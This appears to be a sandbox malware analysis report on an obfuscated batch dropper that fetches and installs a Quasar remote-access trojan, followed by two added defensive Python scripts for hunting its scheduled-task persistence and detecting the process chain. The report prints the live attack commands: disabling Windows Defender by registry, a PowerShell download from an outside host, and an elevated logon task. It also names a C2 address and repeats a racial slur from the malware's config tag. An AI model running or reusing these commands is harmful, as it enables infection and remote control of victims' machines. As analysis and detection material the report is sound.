Analysis

max time kernel: 14s
max time network: 16s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 24-12-2024 17:24
Static task: static1

Behavioral task: behavioral1
Sample: FUD RAT___Obfuscated.bat
Resource: win7-20240903-en

Behavioral task: behavioral2
Sample: FUD RAT___Obfuscated.bat
Resource: win10v2004-20241007-en
General

Target: FUD RAT___Obfuscated.bat
Size: 463B
MD5: a9fdda2577ff67660be21d0d4cd98179
SHA1: 15432871fed4cbb19ec26eaabcc6b193beebbbfb
SHA256: 8f18705cf5653667888ea5f2440e984d22c5207e7e5e2fccb68e7ad71f58bb83
SHA512: 0f43e8b47bdd9d1a2ce65db49868f7698b83bcb5f8d249a29078793e5ca48d75bf8ce99dae00f772c28b766ac761040c0113d9034e7e7d35efb75b39eca5153d
Malware Config

Extracted (from the batch script)
URL: https://whatsabool.online/kingvonpiracyvirus/load.exe

Extracted (from the dropped client)
Family: quasar
Version: 1.4.1
Tag: Dumb Niggas
C2: 85.209.133.15:111
Mutex: 95ddd19c-037b-4e62-8c64-298b31d663b8
encryption_key: 04FB780AC53244A8569349610FCC9CFEE3EEB90D
install_name: Client.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: system
subdirectory: SubDir
Signatures

Quasar family

Quasar payload (2 IoCs)
resource: behavioral2/files/0x0009000000023c8f-18.dat, yara_rule: family_quasar
resource: behavioral2/memory/2040-20-0x0000000000A70000-0x0000000000D92000-memory.dmp, yara_rule: family_quasar

Blocklisted process makes network request (1 IoC)
flow 7, pid 4436, powershell.exe

Downloads MZ/PE file

Executes dropped EXE (2 IoCs)
pid 2040, load.exe
pid 640, Client.exe

Command and Scripting Interpreter: PowerShell (1 IoC)
pid 4436, powershell.exe

Scheduled Task/Job: Scheduled Task (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid 2404, schtasks.exe
pid 4072, schtasks.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid 4436, powershell.exe
pid 4436, powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Token: SeDebugPrivilege, pid 4436, powershell.exe
Token: SeDebugPrivilege, pid 2040, load.exe
Token: SeDebugPrivilege, pid 640, Client.exe

Suspicious use of SetWindowsHookEx (1 IoC)
pid 640, Client.exe

Suspicious use of WriteProcessMemory (12 IoCs)
description | pid | Process | procid_target
PID 1132 wrote to memory of 3252 | 1132 | cmd.exe | 83
PID 1132 wrote to memory of 3252 | 1132 | cmd.exe | 83
PID 1132 wrote to memory of 4436 | 1132 | cmd.exe | 84
PID 1132 wrote to memory of 4436 | 1132 | cmd.exe | 84
PID 1132 wrote to memory of 2040 | 1132 | cmd.exe | 86
PID 1132 wrote to memory of 2040 | 1132 | cmd.exe | 86
PID 2040 wrote to memory of 2404 | 2040 | load.exe | 88
PID 2040 wrote to memory of 2404 | 2040 | load.exe | 88
PID 2040 wrote to memory of 640 | 2040 | load.exe | 90
PID 2040 wrote to memory of 640 | 2040 | load.exe | 90
PID 640 wrote to memory of 4072 | 640 | Client.exe | 91
PID 640 wrote to memory of 4072 | 640 | Client.exe | 91

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
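The persistence registered here (task name "system", ONLOGON trigger, /rl HIGHEST, action under %APPDATA%\SubDir) survives as a task definition file under C:\Windows\System32\Tasks\. The following is an added example for this report, not sandbox output: it parses a task XML constructed to match the schtasks command line in the process tree and a constructed benign task for contrast, and scores the combination of logon trigger, elevated run level and a user-writable action path. The task names passed in are assumed for illustration.

```python
"""Hunt for the scheduled-task persistence this sample registers.
Added example, not part of the sandbox report. Both XML documents below are
constructed: TASK_XML mirrors what `schtasks /create /tn system /sc ONLOGON
/tr ... /rl HIGHEST` writes; BENIGN_XML is an ordinary vendor updater task."""
import re
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace used by every task file under System32\Tasks.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal>
  </Principals>
  <Actions Context="Author">
    <Exec><Command>C:\Users\Admin\AppData\Roaming\SubDir\Client.exe</Command></Exec>
  </Actions>
</Task>
"""

BENIGN_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\Program Files\Vendor\updater.exe</Command></Exec></Actions>
</Task>
"""

# Locations a standard user can write to; a persistent elevated task pointing here is a red flag.
USER_WRITABLE = re.compile(r"\\(AppData|Users\\Public|ProgramData|Windows\\Temp)\\", re.I)

# Low-information task names that malware picks to blend in (the sample uses "system").
GENERIC_NAMES = {"system", "update", "windows"}


def assess_task(xml_text, task_name):
    """Return the triage verdict for one task definition (XML text plus its file name)."""
    root = ET.fromstring(xml_text)
    logon = root.find("t:Triggers/t:LogonTrigger", NS) is not None
    runlevel = (root.findtext("t:Principals/t:Principal/t:RunLevel", default="", namespaces=NS) or "").strip()
    commands = [c.text or "" for c in root.findall("t:Actions/t:Exec/t:Command", NS)]

    reasons = []
    if logon:
        reasons.append("logon trigger")
    if runlevel == "HighestAvailable":
        reasons.append("runs elevated (HighestAvailable)")
    user_dir_cmds = [c for c in commands if USER_WRITABLE.search(c)]
    for cmd in user_dir_cmds:
        reasons.append(f"action in user-writable path: {cmd}")
    if task_name.lower() in GENERIC_NAMES and user_dir_cmds:
        reasons.append(f"generic task name {task_name!r} points into a user-writable path")

    # Three independent tells together are a confident hit; one alone is common in benign tasks.
    return {"task": task_name, "suspicious": len(reasons) >= 3, "reasons": reasons, "commands": commands}


if __name__ == "__main__":
    for name, xml_text in (("system", TASK_XML), ("VendorUpdate", BENIGN_XML)):
        verdict = assess_task(xml_text, name)
        print(name, "SUSPICIOUS" if verdict["suspicious"] else "ok", verdict["reasons"])
```

On a live host the same function can be fed each file under C:\Windows\System32\Tasks\ (they are UTF-16 XML, so decode before parsing); matching the action path against the extracted config (subdirectory SubDir, install_name Client.exe, startup_key system) turns a generic hit into an attribution to this sample.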
Processes

1. C:\Windows\system32\cmd.exe (PID 1132)
   C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FUD RAT___Obfuscated.bat"
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\system32\reg.exe (PID 3252)
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4436)
      powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://whatsabool.online/kingvonpiracyvirus/load.exe', 'C:\Users\Admin\AppData\Local\Temp\load.exe')"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

   2. C:\Users\Admin\AppData\Local\Temp\load.exe (PID 2040)
      "C:\Users\Admin\AppData\Local\Temp\load.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\SYSTEM32\schtasks.exe (PID 2404)
         "schtasks" /create /tn "system" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
         - Scheduled Task/Job: Scheduled Task

      3. C:\Users\Admin\AppData\Roaming\SubDir\Client.exe (PID 640)
         "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
         - Executes dropped EXE
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of SetWindowsHookEx
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\SYSTEM32\schtasks.exe (PID 4072)
            "schtasks" /create /tn "system" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
            - Scheduled Task/Job: Scheduled Task
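The process tree and the WriteProcessMemory parent/child pairs above give everything needed to write the detection for this chain from endpoint telemetry alone: the batch file disables Defender through policy, pulls load.exe with a WebClient cradle, runs it from Temp, and the Quasar client persists itself with an ONLOGON task at the highest run level. The following is an added example for this report, not sandbox output. The events are constructed from the tree (Sysmon Event ID 1 style records with pid, ppid, image and command line); cmd.exe's own parent does not appear in the report, so its ppid is left as None.

```python
"""Process-event detection for the dropper chain in this report.
Added example; EVENTS is constructed from the process tree and the
WriteProcessMemory pairs above, not exported from the sandbox."""
import re
from collections import defaultdict

# Constructed process-creation events (Sysmon Event ID 1 style). ppid None = parent not in report.
EVENTS = [
    {"pid": 1132, "ppid": None, "image": r"C:\Windows\system32\cmd.exe",
     "cmd": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FUD RAT___Obfuscated.bat"'},
    {"pid": 3252, "ppid": 1132, "image": r"C:\Windows\system32\reg.exe",
     "cmd": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
    {"pid": 4436, "ppid": 1132, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'''powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://whatsabool.online/kingvonpiracyvirus/load.exe', 'C:\Users\Admin\AppData\Local\Temp\load.exe')"'''},
    {"pid": 2040, "ppid": 1132, "image": r"C:\Users\Admin\AppData\Local\Temp\load.exe",
     "cmd": r'"C:\Users\Admin\AppData\Local\Temp\load.exe"'},
    {"pid": 2404, "ppid": 2040, "image": r"C:\Windows\SYSTEM32\schtasks.exe",
     "cmd": r'"schtasks" /create /tn "system" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f'},
    {"pid": 640, "ppid": 2040, "image": r"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe",
     "cmd": r'"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"'},
    {"pid": 4072, "ppid": 640, "image": r"C:\Windows\SYSTEM32\schtasks.exe",
     "cmd": r'"schtasks" /create /tn "system" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f'},
]

USER_WRITABLE = re.compile(r"\\AppData\\(Local\\Temp|Roaming)\\", re.I)
DOWNLOADFILE = re.compile(r"DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)

# Each rule is one behaviour from the signature list, keyed on image + command line.
RULES = [
    ("defender_tamper", lambda e: e["image"].lower().endswith("\\reg.exe")
        and "disableantispyware" in e["cmd"].lower()),
    ("powershell_download_cradle", lambda e: "powershell" in e["image"].lower()
        and re.search(r"DownloadFile|DownloadString|Invoke-WebRequest|Net\.WebClient", e["cmd"], re.I)
        and re.search(r"https?://", e["cmd"], re.I)),
    ("exec_from_user_writable_dir", lambda e: bool(USER_WRITABLE.search(e["image"]))),
    ("schtasks_logon_highest_userdir", lambda e: e["image"].lower().endswith("\\schtasks.exe")
        and re.search(r"/sc\s+ONLOGON", e["cmd"], re.I)
        and re.search(r"/rl\s+HIGHEST", e["cmd"], re.I)
        and re.search(r'/tr\s+"?[^"]*\\AppData\\', e["cmd"], re.I)),
]


def flag_events(events):
    """Return (rule_name, pid) for every event that matches a rule."""
    return [(name, e["pid"]) for e in events for name, pred in RULES if pred(e)]


def ancestry(events, pid):
    """Walk ppid links upward; returns [pid, parent, ..., root]."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(pid)
        pid = by_pid[pid]["ppid"]
    return chain


def download_then_execute(events):
    """Correlate a DownloadFile destination with any later process whose image is that path."""
    hits = []
    for e in events:
        m = DOWNLOADFILE.search(e["cmd"])
        if not m:
            continue
        url, dest = m.groups()
        for later in events:
            if later["image"].lower() == dest.lower():
                hits.append({"url": url, "path": dest, "downloader": e["pid"], "executed_as": later["pid"]})
    return hits


def triage(events):
    """Group hits by rule, find the root of every flagged chain, and count distinct behaviours."""
    by_rule = defaultdict(set)
    for name, pid in flag_events(events):
        by_rule[name].add(pid)
    roots = {ancestry(events, pid)[-1] for pids in by_rule.values() for pid in pids}
    return {"rules": {k: sorted(v) for k, v in by_rule.items()},
            "roots": sorted(roots),
            "download_exec": download_then_execute(events),
            "distinct_behaviours": len(by_rule)}


if __name__ == "__main__":
    result = triage(EVENTS)
    for rule, pids in result["rules"].items():
        print(f"{rule:32s} {pids}")
    print("chain root(s):", result["roots"], "download->exec:", result["download_exec"])
```

Any one rule fires on benign admin activity now and then; the value is in the correlation, which is why triage() reports the number of distinct behaviours under a single root process and pairs the DownloadFile destination with the process that later ran from it. Here all four behaviours roll up to PID 1132 and the downloaded path is executed as PID 2040.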
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 3.1MB
MD5: 68b6e948c723b1127c027d2dc9505a13
SHA1: e8056196a1ada4f7c266d4d5417d02492b4fbe6e
SHA256: cb311e549d10e963d612cefd4fa5ca5d49f0f3b16db3525823e811ec58ec6ebb
SHA512: 079eb9475d5984a95590387d2ed32fda030785ae1911a1e8a7e7732e3d62e313a88769b96122814a077fb1824424e6f82bcc415e89e7f1d1e981b052a4172761